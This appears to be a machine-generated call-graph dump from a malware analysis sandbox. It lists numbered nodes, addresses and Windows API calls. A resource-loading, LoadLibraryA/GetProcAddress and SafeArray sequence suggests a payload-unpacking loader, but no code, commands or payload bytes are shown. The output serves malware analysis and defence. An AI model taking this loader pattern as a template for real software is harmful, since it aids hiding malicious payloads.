95666->95667 95669 a3009d0 6 API calls 95667->95669 95670 a3009c6 95667->95670 95671 a3009e0 95667->95671 95669->95670 95672 a300a0c 95671->95672 95673 a300a1d 95672->95673 95674 a3019d9 2 API calls 95672->95674 95675 6aca1c0 4 API calls 95672->95675 95673->95670 95674->95673 95675->95673 94953 6ac22a8 94956 6ac0fb8 94953->94956 94955 6ac22be 94957 6ac0fc3 94956->94957 94958 6ac1eb0 94957->94958 94964 6ac22c9 94957->94964 94968 6ac9c60 94957->94968 94972 6ac9c31 94957->94972 94976 6ac22d8 94957->94976 94958->94955 94959 6ac1e7a 94959->94955 94965 6ac22d2 94964->94965 94966 6ac238e 94965->94966 94967 6ac2419 KiUserCallbackDispatcher 94965->94967 94967->94966 94969 6ac9c80 94968->94969 94970 6ac22d8 KiUserCallbackDispatcher 94969->94970 94971 6ac9cd9 94970->94971 94971->94959 94973 6ac9c60 94972->94973 94974 6ac22d8 KiUserCallbackDispatcher 94973->94974 94975 6ac9cd9 94974->94975 94975->94959 94977 6ac2307 94976->94977 94978 6ac2419 KiUserCallbackDispatcher 94977->94978 94979 6ac238e 94977->94979 94978->94979 94980 6aceba8 94981 6acebbf 94980->94981 94983 6acecee 94981->94983 94984 6acdbc8 94981->94984 94985 6acdbd3 94984->94985 94987 6acf04e 94985->94987 94992 6adc1d0 94985->94992 94996 6adc1c0 94985->94996 94986 6acf0ef 94988 6adc1c0 SendMessageW 94986->94988 94989 6adc1d0 SendMessageW 94986->94989 94987->94983 94988->94987 94989->94987 94993 6adc1e0 94992->94993 95000 6ada158 94993->95000 94997 6adc1e0 94996->94997 94998 6ada158 SendMessageW 94997->94998 94999 6adc1f1 94998->94999 94999->94986 95001 6adc208 SendMessageW 95000->95001 95002 6adc1f1 95001->95002 95002->94986 95440 6ad5be8 95441 6ad5c2c 95440->95441 95442 6ad5c36 EnumThreadWindows 95440->95442 95441->95442 95443 6ad5c68 95442->95443 95444 5aa6ee0 95445 5aa6eeb 95444->95445 95448 5aa593c 95445->95448 95447 5aa6f14 95449 5aa5947 95448->95449 95452 5aa595c 95449->95452 95451 5aa6fb5 95451->95447 95453 5aa5967 95452->95453 95456 5aa598c 95453->95456 95455 5aa709a 95455->95451 95457 5aa5997 95456->95457 95460 5aa59bc 95457->95460 95459 5aa718d 95459->95455 95462 5aa59c7 95460->95462 95461 5aa8729 95461->95459 95462->95461 95464 5aaca60 95462->95464 95466 5aaca64 95464->95466 95465 5aacab5 95465->95461 95466->95465 95469 5aacc0f 95466->95469 95473 5aacc20 95466->95473 95470 5aacc14 95469->95470 95471 5aacc67 95470->95471 95477 5aac558 95470->95477 95471->95465 95474 5aacc21 95473->95474 95475 5aacc67 95474->95475 95476 5aac558 11 API calls 95474->95476 95475->95465 95476->95475 95479 5aac563 95477->95479 95478 5aad578 95479->95478 95481 5aac684 95479->95481 95482 5aac68f 95481->95482 95483 5aa59bc 11 API calls 95482->95483 95484 5aad5e7 95483->95484 95495 5aada68 95484->95495 95503 5aada5b 95484->95503 95485 5aad5f6 95486 5aac694 8 API calls 95485->95486 95487 5aad610 95486->95487 95488 5aac6a4 8 API calls 95487->95488 95489 5aad617 95488->95489 95491 5aaf328 8 API calls 95489->95491 95492 5aaf340 8 API calls 95489->95492 95490 5aad621 95490->95478 95491->95490 95492->95490 95496 5aada96 95495->95496 95499 5aadabf 95496->95499 95502 5aadbd3 95496->95502 95511 5aad6c0 GetFocus 95496->95511 95498 5aadb67 95498->95502 95512 5aac6a4 95498->95512 95499->95498 95501 5aadb62 KiUserCallbackDispatcher 95499->95501 95499->95502 95501->95498 95504 5aada96 95503->95504 95507 5aadabf 95504->95507 95510 5aadbd3 95504->95510 95516 5aad6c0 GetFocus 95504->95516 95506 5aadb67 95508 5aac6a4 8 API calls 95506->95508 95506->95510 95507->95506 95509 5aadb62 KiUserCallbackDispatcher 95507->95509 95507->95510 95508->95510 95509->95506 95511->95499 95513 5aac6af 95512->95513 95514 5aad9c8 8 API calls 95513->95514 95515 5aaf16f 95514->95515 95515->95502 95516->95507 95676 b3312b8 95677 b3312f1 95676->95677 95678 b3313b5 95677->95678 95679 a30c232 GetSysColorBrush 95677->95679 95680 a30ad3c GetSysColorBrush 95677->95680 95679->95678 95680->95678 95681 5a34428 95682 5a34438 95681->95682 95692 6adc048 95682->95692 95697 6ad7491 95682->95697 95701 6ad74a0 95682->95701 95705 5a35a6a 95682->95705 95717 5a35a68 95682->95717 95729 5a35d14 95682->95729 95735 5a35a5b 95682->95735 95747 6adc038 95682->95747 95683 5a34461 95693 6adc068 95692->95693 95694 6adc09a 95693->95694 95695 6adc1c0 SendMessageW 95693->95695 95696 6adc1d0 SendMessageW 95693->95696 95694->95683 95695->95694 95696->95694 95698 6ad74a0 95697->95698 95700 5a35d14 8 API calls 95698->95700 95699 6ad752a 95699->95683 95700->95699 95702 6ad74d5 95701->95702 95704 5a35d14 8 API calls 95702->95704 95703 6ad752a 95703->95683 95704->95703 95706 5a35a94 95705->95706 95708 5a35ccc 95706->95708 95752 5a356e0 95706->95752 95709 5a345a0 8 API calls 95708->95709 95710 5a35e74 95708->95710 95709->95710 95710->95683 95711 5a35b4d 95716 5a35bf5 95711->95716 95758 5a345a0 95711->95758 95713 5a35bbf 95714 5a345a0 8 API calls 95713->95714 95714->95716 95715 5a345a0 8 API calls 95715->95708 95716->95715 95722 5a35a69 95717->95722 95718 5a356e0 8 API calls 95724 5a35b4d 95718->95724 95719 5a35ccc 95720 5a345a0 8 API calls 95719->95720 95721 5a35e74 95719->95721 95720->95721 95721->95683 95722->95718 95722->95719 95723 5a35bf5 95728 5a345a0 8 API calls 95723->95728 95724->95723 95725 5a345a0 8 API calls 95724->95725 95726 5a35bbf 95725->95726 95727 5a345a0 8 API calls 95726->95727 95727->95723 95728->95719 95730 5a35d1d 95729->95730 95732 5a35d3b 95729->95732 95731 5a345a0 8 API calls 95730->95731 95730->95732 95731->95732 95733 5a345a0 8 API calls 95732->95733 95734 5a35e74 95732->95734 95733->95734 95734->95683 95736 5a35a64 95735->95736 95737 5a356e0 8 API calls 95736->95737 95738 5a35ccc 95736->95738 95741 5a35b4d 95737->95741 95739 5a345a0 8 API calls 95738->95739 95740 5a35e74 95738->95740 95739->95740 95740->95683 95742 5a345a0 8 API calls 95741->95742 95746 5a35bf5 95741->95746 95743 5a35bbf 95742->95743 95744 5a345a0 8 API calls 95743->95744 95744->95746 95745 5a345a0 8 API calls 95745->95738 95746->95745 95748 6adc041 95747->95748 95749 6adc09a 95748->95749 95750 6adc1c0 SendMessageW 95748->95750 95751 6adc1d0 SendMessageW 95748->95751 95749->95683 95750->95749 95751->95749 95754 5a356eb 95752->95754 95753 5a345a0 8 API calls 95756 5a35fc9 95753->95756 95755 5a345a0 8 API calls 95754->95755 95754->95756 95757 5a36007 95754->95757 95755->95756 95756->95753 95756->95757 95757->95711 95759 5a345a1 95758->95759 95760 5a345ed 95759->95760 95765 5aaf328 95759->95765 95773 6ad6270 95759->95773 95784 5aaf340 95759->95784 95792 6ad6280 95759->95792 95760->95713 95766 5aaf33c 95765->95766 95767 5aaf3af 95766->95767 95768 5aaf37d 95766->95768 95769 5aaf328 8 API calls 95766->95769 95770 5aaf340 8 API calls 95766->95770 95767->95768 95803 a302a19 95767->95803 95812 a302a28 95767->95812 95768->95760 95769->95767 95770->95767 95774 6ad62b9 95773->95774 95775 6ad6357 95774->95775 95782 5aaf328 8 API calls 95774->95782 95783 5aaf340 8 API calls 95774->95783 95776 6ad63cd 95775->95776 95780 6acdbc8 SendMessageW 95775->95780 95824 6acefb0 95775->95824 95777 6ad6540 95776->95777 95832 5aad8d4 95776->95832 95836 5aaebf0 95776->95836 95777->95777 95780->95776 95782->95775 95783->95775 95785 5aaf341 95784->95785 95786 5aaf3af 95785->95786 95787 5aaf37d 95785->95787 95790 5aaf328 8 API calls 95785->95790 95791 5aaf340 8 API calls 95785->95791 95786->95787 95788 a302a28 8 API calls 95786->95788 95789 a302a19 8 API calls 95786->95789 95787->95760 95788->95787 95789->95787 95790->95786 95791->95786 95793 6ad62b9 95792->95793 95794 6ad6357 95793->95794 95801 5aaf328 8 API calls 95793->95801 95802 5aaf340 8 API calls 95793->95802 95795 6ad63cd 95794->95795 95797 6acdbc8 SendMessageW 95794->95797 95798 6acefb0 SendMessageW 95794->95798 95796 6ad6540 95795->95796 95799 5aaebf0 8 API calls 95795->95799 95800 5aad8d4 8 API calls 95795->95800 95796->95796 95797->95795 95798->95795 95799->95796 95800->95796 95801->95794 95802->95794 95804 a3029e3 95803->95804 95805 a302a26 95803->95805 95810 5a345a0 8 API calls 95804->95810 95817 5a3458f 95804->95817 95807 a302a4d 95805->95807 95808 5a345a0 8 API calls 95805->95808 95809 5a3458f 8 API calls 95805->95809 95806 a3029f0 95806->95768 95807->95768 95808->95807 95809->95807 95810->95806 95814 a302a36 95812->95814 95813 a302a4d 95813->95768 95814->95813 95815 5a345a0 8 API calls 95814->95815 95816 5a3458f 8 API calls 95814->95816 95815->95813 95816->95813 95818 5a3459c 95817->95818 95819 5a345ed 95818->95819 95820 5aaf328 8 API calls 95818->95820 95821 5aaf340 8 API calls 95818->95821 95822 6ad6280 8 API calls 95818->95822 95823 6ad6270 8 API calls 95818->95823 95819->95806 95820->95819 95821->95819 95822->95819 95823->95819 95825 6acefbd 95824->95825 95827 6acf04e 95825->95827 95830 6adc1c0 SendMessageW 95825->95830 95831 6adc1d0 SendMessageW 95825->95831 95826 6acf0ef 95828 6adc1c0 SendMessageW 95826->95828 95829 6adc1d0 SendMessageW 95826->95829 95827->95776 95828->95827 95829->95827 95830->95826 95831->95826 95833 5aad8df 95832->95833 95834 5aac6a4 8 API calls 95833->95834 95835 5aaec95 95833->95835 95834->95835 95835->95777 95837 5aaebf3 95836->95837 95838 5aac6a4 8 API calls 95837->95838 95839 5aaec95 95837->95839 95838->95839 95839->95777 95840 6acb820 95841 6acb86e DrawTextExW 95840->95841 95843 6acb8c6 95841->95843 95517 6adbee0 95518 6adbf06 95517->95518 95519 6adbef6 95517->95519 95520 6adbf53 95519->95520 95522 6adbf88 95519->95522 95523 6adbfa9 95522->95523 95524 6adbfcc 95523->95524 95525 5a34293 5 API calls 95523->95525 95524->95518 95525->95524 95526 6ad3ee0 95527 6ad3f4b 95526->95527 95532 6ad42e1 95526->95532 95528 6ad400b GetCapture 95527->95528 95527->95532 95530 6ad404d 95528->95530 95529 6ad408e GetActiveWindow 95531 6ad40c5 95529->95531 95530->95529 95531->95532 95535 6ada8af 95531->95535 95542 6ada8c0 95531->95542 95536 6ada8c0 95535->95536 95539 6ada8fa 95536->95539 95540 5aada5b 10 API calls 95536->95540 95541 5aada68 10 API calls 95536->95541 95537 6ada9e5 95538 6ada158 SendMessageW 95537->95538 95537->95539 95538->95539 95539->95532 95540->95537 95541->95537 95544 6ada8e6 95542->95544 95543 6ada8fa 95543->95532 95544->95543 95547 5aada5b 10 API calls 95544->95547 95548 5aada68 10 API calls 95544->95548 95545 6ada9e5 95545->95543 95546 6ada158 SendMessageW 95545->95546 95546->95543 95547->95545 95548->95545 95549 6adafe0 95550 6adb061 95549->95550 95552 6adb002 95549->95552 95551 6adb068 95550->95551 95553 5a34293 5 API calls 95550->95553 95554 5a33688 8 API calls 95550->95554 95555 5a33678 8 API calls 95550->95555 95553->95551 95554->95551 95555->95551 95003 40ad50 95006 40b84d 95003->95006 95007 40b900 95006->95007 95017 40b85f 95006->95017 95031 40d2e3 6 API calls __decode_pointer 95007->95031 95009 40b906 95032 40bfc1 62 API calls __getptd_noexit 95009->95032 95014 40b8bc RtlAllocateHeap 95014->95017 95015 40b870 95015->95017 95024 40ec4d 62 API calls 2 library calls 95015->95024 95025 40eaa2 62 API calls 7 library calls 95015->95025 95026 40e7ee GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 95015->95026 95017->95014 95017->95015 95018 40b8ec 95017->95018 95021 40b8f1 95017->95021 95023 40ad5f 95017->95023 95027 40b7fe 62 API calls 4 library calls 95017->95027 95028 40d2e3 6 API calls __decode_pointer 95017->95028 95029 40bfc1 62 API calls __getptd_noexit 95018->95029 95030 40bfc1 62 API calls __getptd_noexit 95021->95030 95024->95015 95025->95015 95027->95017 95028->95017 95029->95021 95030->95023 95031->95009 95032->95023 95844 a309aa0 95845 a309acb 95844->95845 95846 a309ae7 95845->95846 95848 6ad6f40 11 API calls 95845->95848 95847 a309bce 95848->95847 95033 b331722 95037 a30c232 95033->95037 95042 a30ad3c 95033->95042 95038 a30c26b 95037->95038 95039 a30c277 95038->95039 95047 b337490 95038->95047 95053 b3374b0 95038->95053 95043 a30ad47 95042->95043 95044 a30c277 95043->95044 95045 b3374b0 GetSysColorBrush 95043->95045 95046 b337490 GetSysColorBrush 95043->95046 95045->95044 95046->95044 95049 b337495 95047->95049 95048 b337541 95048->95039 95049->95048 95059 b337609 95049->95059 95064 b33ff4d 95049->95064 95067 b3376f0 95049->95067 95055 b3374d2 95053->95055 95054 b337541 95054->95039 95055->95054 95056 b3376f0 GetSysColorBrush 95055->95056 95057 b337609 GetSysColorBrush 95055->95057 95058 b33ff4d GetSysColorBrush 95055->95058 95056->95054 95057->95054 95058->95054 95061 b337621 95059->95061 95060 b337657 95060->95048 95061->95060 95063 b3376f0 GetSysColorBrush 95061->95063 95062 b337684 95062->95048 95063->95062 95071 b337720 95064->95071 95066 b33ff5b 95066->95048 95070 b337720 GetSysColorBrush 95067->95070 95079 b337711 95067->95079 95068 b33770c 95068->95048 95070->95068 95072 b337756 95071->95072 95073 b3378a8 95072->95073 95075 b33b480 95072->95075 95073->95066 95076 b33b48b 95075->95076 95077 b33b8f5 GetSysColorBrush 95076->95077 95078 b33b8b1 95076->95078 95077->95078 95078->95073 95080 b337756 95079->95080 95081 b3378a8 95080->95081 95082 b33b480 GetSysColorBrush 95080->95082 95081->95068 95082->95081 95849 5aacd38 95850 5aacd7e GetCurrentProcess 95849->95850 95852 5aacdc9 95850->95852 95853 5aacdd0 GetCurrentThread 95850->95853 95852->95853 95854 5aace0d GetCurrentProcess 95853->95854 95855 5aace06 95853->95855 95856 5aace43 95854->95856 95855->95854 95857 5aace6b GetCurrentThreadId 95856->95857 95858 5aace9c 95857->95858 95556 5a31cf0 95557 5a31d58 CreateWindowExW 95556->95557 95559 5a31e14 95557->95559 95859 b33e0a0 95860 b33e0b4 95859->95860 95861 b33e0c5 95860->95861 95863 6ad6fb0 5 API calls 95860->95863 95864 6ad6fc0 5 API calls 95860->95864 95862 b33e0e8 95863->95862 95864->95862 95083 a303928 95084 a30393b 95083->95084 95085 a30393f 95084->95085 95086 a303992 KiUserCallbackDispatcher 95084->95086 95086->95085 96343 a30c0e8 96344 a30c115 96343->96344 96346 a30c217 96343->96346 96345 a30c135 96344->96345 96347 a30ad3c GetSysColorBrush 96344->96347 96347->96345 95865 5a31f38 95866 5a31f39 SetWindowLongW 95865->95866 95867 5a31fa4 95866->95867 96348 b33c5e8 96349 b33c643 96348->96349 96353 b33c709 96349->96353 96359 b33c720 96349->96359 96350 b33c6d2 96354 b33c713 96353->96354 96356 b33c77b 96354->96356 96357 a30c232 GetSysColorBrush 96354->96357 96358 a30ad3c GetSysColorBrush 96354->96358 96355 b33c75f 96355->96350 96356->96350 96357->96355 96358->96355 96360 b33c748 96359->96360 96362 b33c77b 96359->96362 96360->96362 96363 a30c232 GetSysColorBrush 96360->96363 96364 a30ad3c GetSysColorBrush 96360->96364 96361 b33c75f 96361->96350 96362->96350 96363->96361 96364->96361 95868 40cbdd 95869 40cbe9 __setmbcp 95868->95869 95912 40d534 HeapCreate 95869->95912 95872 40cc46 95973 41087e 71 API calls 8 library calls 95872->95973 95875 40cc4c 95876 40cc50 95875->95876 95877 40cc58 __RTC_Initialize 95875->95877 95974 40cbb4 62 API calls 3 library calls 95876->95974 95914 411a15 67 API calls 3 library calls 95877->95914 95879 40cc57 95879->95877 95881 40cc66 95882 40cc72 GetCommandLineA 95881->95882 95883 40cc6a 95881->95883 95915 412892 71 API calls 3 library calls 95882->95915 95975 40e79a 62 API calls 3 library calls 95883->95975 95886 40cc71 95886->95882 95887 40cc82 95976 4127d7 107 API calls 3 library calls 95887->95976 95889 40cc8c 95890 40cc90 95889->95890 95891 40cc98 95889->95891 95977 40e79a 62 API calls 3 library calls 95890->95977 95916 41255f 106 API calls 6 library calls 95891->95916 95894 40cc97 95894->95891 95895 40cc9d 95896 40cca1 95895->95896 95897 40cca9 95895->95897 95978 40e79a 62 API calls 3 library calls 95896->95978 95917 40e859 73 API calls 5 library calls 95897->95917 95900 40ccb0 95902 40ccb5 95900->95902 95903 40ccbc 95900->95903 95901 40cca8 95901->95897 95979 40e79a 62 API calls 3 library calls 95902->95979 95918 4019f0 OleInitialize 95903->95918 95906 40ccbb 95906->95903 95907 40ccd8 95908 40ccea 95907->95908 95980 40ea0a 62 API calls _doexit 95907->95980 95981 40ea36 62 API calls _doexit 95908->95981 95911 40ccef __setmbcp 95913 40cc3a 95912->95913 95913->95872 95972 40cbb4 62 API calls 3 library calls 95913->95972 95914->95881 95915->95887 95916->95895 95917->95900 95919 401ab9 95918->95919 95982 40b99e 95919->95982 95921 401abf 95922 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 95921->95922 95952 402467 95921->95952 95923 401dc3 FindCloseChangeNotification GetModuleHandleA 95922->95923 95931 401c55 95922->95931 95995 401650 95923->95995 95925 401e8b FindResourceA LoadResource LockResource SizeofResource 95926 40b84d _malloc 62 API calls 95925->95926 95927 401ebf 95926->95927 95997 40af66 95927->95997 95929 401c9c CloseHandle 95929->95907 95930 401ecb _memset 95932 401efc SizeofResource 95930->95932 95931->95929 95935 401cf9 Module32Next 95931->95935 95933 401f1c 95932->95933 95934 401f5f 95932->95934 95933->95934 96035 401560 __VEC_memcpy __shift 95933->96035 95937 401f92 _memset 95934->95937 96036 401560 __VEC_memcpy __shift 95934->96036 95935->95923 95944 401d0f 95935->95944 95939 401fa2 FreeResource 95937->95939 95940 40b84d _malloc 62 API calls 95939->95940 95941 401fbb SizeofResource 95940->95941 95942 401fe5 _memset 95941->95942 95943 4020aa LoadLibraryA 95942->95943 95945 401650 95943->95945 95944->95929 95947 401dad Module32Next 95944->95947 95946 40216c GetProcAddress 95945->95946 95948 4021aa 95946->95948 95946->95952 95947->95923 95947->95944 95948->95952 96009 4018f0 95948->96009 95950 40243f 95950->95952 96037 40b6b5 62 API calls 2 library calls 95950->96037 95952->95907 95953 4021f1 95953->95950 96021 401870 95953->96021 95955 402269 VariantInit 95956 401870 75 API calls 95955->95956 95957 40228b VariantInit 95956->95957 95958 4022a7 95957->95958 95959 4022d9 SafeArrayCreate SafeArrayAccessData 95958->95959 96026 40b350 95959->96026 95962 40232c 95963 402354 SafeArrayDestroy 95962->95963 95971 40235b 95962->95971 95963->95971 95964 402392 SafeArrayCreateVector 95965 4023a4 95964->95965 95966 4023bc VariantClear VariantClear 95965->95966 96028 4019a0 95966->96028 95969 40242e 95970 4019a0 65 API calls 95969->95970 95970->95950 95971->95964 95972->95872 95973->95875 95974->95879 95975->95886 95976->95889 95977->95894 95978->95901 95979->95906 95980->95908 95981->95911 95984 40b9aa _strnlen __setmbcp 95982->95984 95983 40b9b8 96038 40bfc1 62 API calls __getptd_noexit 95983->96038 95984->95983 95987 40b9ec 95984->95987 95986 40b9bd 96039 40e744 6 API calls 2 library calls 95986->96039 96040 40d6e0 62 API calls 2 library calls 95987->96040 95990 40b9f3 96041 40b917 120 API calls 3 library calls 95990->96041 95992 40b9ff 96042 40ba18 LeaveCriticalSection _doexit 95992->96042 95993 40b9cd __setmbcp 95993->95921 95996 4017cc _memcpy_s 95995->95996 95996->95925 95999 40af70 95997->95999 95998 40b84d _malloc 62 API calls 95998->95999 95999->95998 96000 40af8a 95999->96000 96005 40af8c std::bad_alloc::bad_alloc 95999->96005 96043 40d2e3 6 API calls __decode_pointer 95999->96043 96000->95930 96002 40afb2 96045 40af49 62 API calls std::exception::exception 96002->96045 96004 40afbc 96046 40cd39 RaiseException 96004->96046 96005->96002 96044 40d2bd 73 API calls __cinit 96005->96044 96008 40afca 96010 401903 lstrlenA 96009->96010 96011 4018fc 96009->96011 96047 4017e0 96010->96047 96011->95953 96014 401940 GetLastError 96016 40194b MultiByteToWideChar 96014->96016 96017 40198d 96014->96017 96015 401996 96015->95953 96018 4017e0 72 API calls 96016->96018 96017->96015 96055 401030 GetLastError 96017->96055 96019 401970 MultiByteToWideChar 96018->96019 96019->96017 96022 40af66 74 API calls 96021->96022 96023 40187c 96022->96023 96024 401885 SysAllocString 96023->96024 96025 4018a4 96023->96025 96024->96025 96025->95955 96027 40231a SafeArrayUnaccessData 96026->96027 96027->95962 96029 4019aa InterlockedDecrement 96028->96029 96034 4019df VariantClear 96028->96034 96030 4019b8 96029->96030 96029->96034 96031 4019c2 SysFreeString 96030->96031 96032 4019c9 96030->96032 96030->96034 96031->96032 96059 40aec0 63 API calls 2 library calls 96032->96059 96034->95969 96035->95933 96036->95937 96037->95952 96038->95986 96040->95990 96041->95992 96042->95993 96043->95999 96044->96002 96045->96004 96046->96008 96048 4017e9 96047->96048 96053 401844 96048->96053 96054 40182d 96048->96054 96056 40b783 72 API calls 4 library calls 96048->96056 96052 40186d MultiByteToWideChar 96052->96014 96052->96015 96053->96052 96058 40b743 62 API calls 2 library calls 96053->96058 96054->96053 96057 40b6b5 62 API calls 2 library calls 96054->96057 96056->96054 96057->96053 96058->96053 96059->96034 96365 6adad70 96366 6adad97 96365->96366 96367 6adae2d 96366->96367 96370 5aac6a4 8 API calls 96366->96370 96371 5aaf13b 96366->96371 96368 6adadf8 96368->96368 96370->96368 96372 5aaf144 96371->96372 96375 5aad9c8 96372->96375 96374 5aaf16f 96374->96368 96377 5aad9d3 96375->96377 96376 5aaf318 96376->96374 96377->96376 96379 5aaf242 96377->96379 96381 5aaf328 8 API calls 96377->96381 96382 5aaf340 8 API calls 96377->96382 96387 6adbe50 96377->96387 96391 6adbe40 96377->96391 96378 5aaf2e1 96385 6adcc30 7 API calls 96378->96385 96386 6adcc40 7 API calls 96378->96386 96379->96378 96380 5aad9c8 8 API calls 96379->96380 96380->96379 96381->96379 96382->96379 96385->96376 96386->96376 96388 6adbe7d 96387->96388 96389 5aaf328 8 API calls 96387->96389 96390 5aaf340 8 API calls 96387->96390 96389->96388 96390->96388 96393 5aaf328 8 API calls 96391->96393 96394 5aaf340 8 API calls 96391->96394 96392 6adbe7d 96393->96392 96394->96392 96060 24eaed0 96061 24eaf23 LoadLibraryA 96060->96061 96063 24eafb6 96061->96063 95087 6ac5fb3 95088 6ac5fba 95087->95088 95089 6ac602b 95087->95089 95098 6acf208 95089->95098 95105 6ac60e8 95089->95105 95111 6ac60db 95089->95111 95117 6acf1f7 95089->95117 95090 6ac6034 95091 6ac6044 95090->95091 95124 6aca1e8 95090->95124 95128 6aca1d7 95090->95128 95101 6acf21c 95098->95101 95099 6acf26c 95100 6ac60e8 2 API calls 95099->95100 95104 6acf26a 95100->95104 95101->95099 95102 6acf24e 95101->95102 95103 6ac60e8 2 API calls 95102->95103 95103->95104 95104->95090 95106 6ac60f6 95105->95106 95107 6ac613e 95106->95107 95132 6ad7548 95106->95132 95136 6ad7550 95106->95136 95107->95090 95108 6ac6139 95108->95090 95113 6ac60e8 95111->95113 95112 6ac613e 95112->95090 95113->95112 95115 6ad7548 SetWindowTextW 95113->95115 95116 6ad7550 SetWindowTextW 95113->95116 95114 6ac6139 95114->95090 95115->95114 95116->95114 95118 6acf208 95117->95118 95119 6acf26c 95118->95119 95121 6acf24e 95118->95121 95120 6ac60e8 2 API calls 95119->95120 95122 6acf26a 95120->95122 95123 6ac60e8 2 API calls 95121->95123 95122->95090 95123->95122 95125 6aca210 95124->95125 95140 6ac0f88 95125->95140 95127 6aca278 95129 6aca1e8 95128->95129 95130 6ac0f88 2 API calls 95129->95130 95131 6aca278 95130->95131 95133 6ad7550 SetWindowTextW 95132->95133 95135 6ad75c9 95133->95135 95135->95108 95137 6ad7598 SetWindowTextW 95136->95137 95138 6ad7592 95136->95138 95139 6ad75c9 95137->95139 95138->95137 95139->95108 95143 6ac0f93 95140->95143 95141 6ac1c5a 95141->95127 95142 6ac1c96 95142->95127 95143->95141 95143->95142 95147 6ac1dcf 95143->95147 95151 6ac1de0 95143->95151 95144 6ac1ce8 95148 6ac1ddd 95147->95148 95149 6ac0fb8 2 API calls 95148->95149 95150 6ac1df7 95149->95150 95150->95144 95152 6ac0fb8 2 API calls 95151->95152 95153 6ac1df7 95152->95153 95153->95144 95154 a305810 95155 a305826 95154->95155 95156 a30587d 95155->95156 95158 6ac9c60 KiUserCallbackDispatcher 95155->95158 95159 6ac9c31 KiUserCallbackDispatcher 95155->95159 95157 a305847 95158->95157 95159->95157 96395 a3031d0 96396 a3031df 96395->96396 96397 a3031e8 96395->96397 96398 6ad6f20 11 API calls 96396->96398 96399 6ad6f10 11 API calls 96396->96399 96398->96397 96399->96397 96400 6acd748 96401 6acd75c 96400->96401 96404 6acd770 96400->96404 96407 6acd760 96400->96407 96411 6acd848 96404->96411 96405 6acd7ae 96405->96401 96408 6acd770 96407->96408 96410 6acd848 2 API calls 96408->96410 96409 6acd7ae 96409->96401 96410->96409 96412 6acd852 96411->96412 96413 6acd80f 96411->96413 96415 6ac1dcf 2 API calls 96412->96415 96416 6ac1de0 2 API calls 96412->96416 96413->96405 96414 6acd88a 96414->96405 96415->96414 96416->96414 96417 6adb648 96418 6adb688 96417->96418 96419 6adb656 96417->96419 96420 6adb65d 96419->96420 96422 6adb6a0 96419->96422 96423 6adb70b 96422->96423 96426 6adb6d6 96422->96426 96424 6adb852 96423->96424 96425 6adb71b 96423->96425 96424->96426 96427 5a34293 5 API calls 96424->96427 96425->96426 96428 5a34293 5 API calls 96425->96428 96429 5a33688 8 API calls 96425->96429 96430 5a33678 8 API calls 96425->96430 96426->96420 96427->96426 96428->96426 96429->96426 96430->96426 96064 5aaf30d 96065 5aaf318 96064->96065 96068 6adcc40 96064->96068 96073 6adcc30 96064->96073 96070 6adcc52 96068->96070 96069 6adcc8f 96069->96065 96070->96069 96078 6adcf00 96070->96078 96088 6adcf10 96070->96088 96075 6adcc40 96073->96075 96074 6adcc8f 96074->96065 96075->96074 96076 6adcf00 7 API calls 96075->96076 96077 6adcf10 7 API calls 96075->96077 96076->96074 96077->96074 96079 6adcf33 96078->96079 96081 6adcfd6 96079->96081 96119 6adc3e8 MonitorFromPoint 96079->96119 96082 6add068 96081->96082 96087 6aca1c0 4 API calls 96081->96087 96098 6acf138 96081->96098 96104 6add398 96081->96104 96109 6acf148 96081->96109 96114 6add388 96081->96114 96082->96069 96087->96082 96089 6adcf33 96088->96089 96091 6adcfd6 96089->96091 96146 6adc3e8 MonitorFromPoint 96089->96146 96092 6add068 96091->96092 96093 6acf138 4 API calls 96091->96093 96094 6acf148 4 API calls 96091->96094 96095 6add388 2 API calls 96091->96095 96096 6add398 2 API calls 96091->96096 96097 6aca1c0 4 API calls 96091->96097 96092->96069 96093->96092 96094->96092 96095->96092 96096->96092 96097->96092 96099 6acf110 96098->96099 96101 6acf142 96098->96101 96099->96082 96100 6acf177 96100->96082 96101->96100 96102 6ac5fe0 4 API calls 96101->96102 96103 6acf1f5 96102->96103 96103->96082 96106 6add3ad 96104->96106 96105 6add68b 96105->96082 96106->96105 96120 a300040 96106->96120 96125 a300007 96106->96125 96111 6acf15c 96109->96111 96110 6acf177 96110->96082 96111->96110 96112 6ac5fe0 4 API calls 96111->96112 96113 6acf1f5 96112->96113 96113->96082 96116 6add392 96114->96116 96115 6add68b 96115->96082 96116->96115 96117 a300040 2 API calls 96116->96117 96118 a300007 2 API calls 96116->96118 96117->96115 96118->96115 96119->96081 96122 a30006e 96120->96122 96121 a3000f9 96122->96121 96130 a3001a8 96122->96130 96135 a300198 96122->96135 96127 a30006e 96125->96127 96126 a3000f9 96127->96126 96128 a3001a8 2 API calls 96127->96128 96129 a300198 2 API calls 96127->96129 96128->96126 96129->96126 96131 a300200 96130->96131 96132 a3001ba 96130->96132 96131->96121 96132->96131 96141 a300340 SetTimer 96132->96141 96143 a30033e 96132->96143 96136 a300149 96135->96136 96138 a30019b 96135->96138 96137 a300200 96137->96121 96138->96137 96139 a300340 SetTimer 96138->96139 96140 a30033e SetTimer 96138->96140 96139->96137 96140->96137 96142 a3003ac 96141->96142 96142->96131 96144 a300340 SetTimer 96143->96144 96145 a3003ac 96144->96145 96145->96131 96146->96091 95160 5aacf80 95161 5aacf81 DuplicateHandle 95160->95161 95162 5aad016 95161->95162 95560 6acd8c0 95561 6acd8f6 95560->95561 95562 6acd9b5 95561->95562 95565 6ad29a0 95561->95565 95569 6ad2990 95561->95569 95566 6ad29e3 95565->95566 95567 6ad2a32 95566->95567 95568 6ad2a01 MonitorFromPoint 95566->95568 95567->95562 95568->95567 95570 6ad29a0 95569->95570 95571 6ad2a01 MonitorFromPoint 95570->95571 95572 6ad2a32 95570->95572 95571->95572 95572->95562 95163 6ad6980 95164 6ad6999 95163->95164 95175 6ad69b5 95163->95175 95165 6ad699e 95164->95165 95166 6ad69e0 95164->95166 95167 6ad69ba 95165->95167 95168 6ad69a3 95165->95168 95169 6ad6c6c 95166->95169 95170 6ad69f1 95166->95170 95166->95175 95167->95175 95178 6ad6ae6 95167->95178 95179 6ad6bd8 95167->95179 95180 6ad6c34 95167->95180 95182 6ad6b2e 95167->95182 95171 6ad69ac 95168->95171 95172 6ad6bca 95168->95172 95207 6ad65dc 95169->95207 95170->95175 95170->95178 95170->95182 95171->95175 95176 6ad6c42 95171->95176 95199 6ad4e30 95172->95199 95175->95182 95185 6ad6f20 11 API calls 95175->95185 95186 6ad6f10 11 API calls 95175->95186 